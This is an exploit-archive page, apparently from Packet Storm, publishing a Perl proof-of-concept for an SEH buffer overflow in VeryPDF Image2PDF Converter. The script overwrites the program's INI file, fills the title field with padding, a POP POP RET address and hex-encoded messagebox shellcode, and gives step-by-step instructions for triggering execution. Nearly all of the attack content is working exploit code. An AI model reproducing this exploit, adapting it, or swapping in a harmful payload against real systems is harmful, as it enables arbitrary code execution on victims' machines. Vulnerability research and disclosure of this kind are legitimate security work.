what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

VeryPDF Image2PDF Converter SEH Buffer Overflow

VeryPDF Image2PDF Converter SEH Buffer Overflow
Posted Oct 9, 2015
Authored by Robbie Corley

VeryPDF Image2PDF Converter SEH buffer oevrflow exploit that spawns messagebox shellcode.

tags | exploit, overflow, shellcode
SHA-256 | fb0eb094b5e573fada445410e8039241a3a11cfe31027910642ed1bad8b24dda

VeryPDF Image2PDF Converter SEH Buffer Overflow

Change Mirror Download
#********************************************************************************************************************************************
#
# Exploit Title: VeryPDF Image2PDF Converter SEH Buffer Overflow
# Date: 10-7-2015
# Software Link: http://www.verypdf.com/tif2pdf/img2pdf.exe
# Exploit Author: Robbie Corley
# Platform Tested: Windows 7 x64
# Contact: c0d3rc0rl3y@gmail.com
# Website:
# CVE:
# Category: Local Exploit
#
# Description:
# The title parameter contained within the c:\windows\Image2PDF.INI is vulnerable to a buffer overflow.
# This can be exploited using SEH overwrite.
#
# Instructions:
# 1. Run this sploit as-is. This will generate the new .ini file and place it in c:\windows, overwriting the existing file
# 2. Run the Image2PDF program, hit [try], file --> add files
# 3. Open any .tif file. Here's the location of one that comes with the installation: C:\Program Files (x86)\VeryPDF Image2PDF v3.2\trial.tif
# 4. Hit 'Make PDF', type in anything for the name of the pdf-to-be, and be greeted with your executed shellcode ;)
#**********************************************************************************************************************************************

#standard messagebox shellcode.
$shellcode =
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";

$padding="\x90" x 2985;
$seh=pack('V',0x6E4B3045); #STANDARD POP POP RET
$morepadding="\x90" x 1096;

open(myfile,'>c:\\windows\\Image2PDF.INI'); #generate the dummy DWF file

#.ini file header & shellcode
print myfile "[SaveMode]
m_iMakePDFMode=0
m_iSaveMode=0
m_szFilenameORPath=
m_iDestinationMode=0
m_bAscFilename=0
m_strFileNumber=0001
[BaseSettingDlg]
m_bCheckDespeckle=0
m_bCheckSkewCorrect=0
m_bCheckView=0
m_szDPI=default
m_bCheckBWImage=1
[SetPDFInfo]
m_szAuthor=
m_szSubject=
m_szTitle=".$padding."\xEB\x06\x90\x90".$seh.$shellcode.$morepadding;

close (myfile); #close the file

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close